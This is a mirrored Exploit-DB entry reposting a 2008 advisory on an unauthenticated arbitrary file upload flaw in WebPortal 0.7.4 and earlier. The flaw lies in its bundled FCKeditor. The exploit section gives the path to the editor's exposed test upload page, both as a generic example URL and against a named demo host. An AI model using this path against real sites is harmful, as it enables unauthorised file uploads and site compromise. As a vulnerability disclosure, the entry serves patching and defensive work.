- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6448
- Проверка EDB
-
- Пройдено
- Автор
- S.W.A.T.
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-09-12
Код:
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# [email protected]
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# milw0rm.com [2008-09-12]- Источник
- www.exploit-db.com
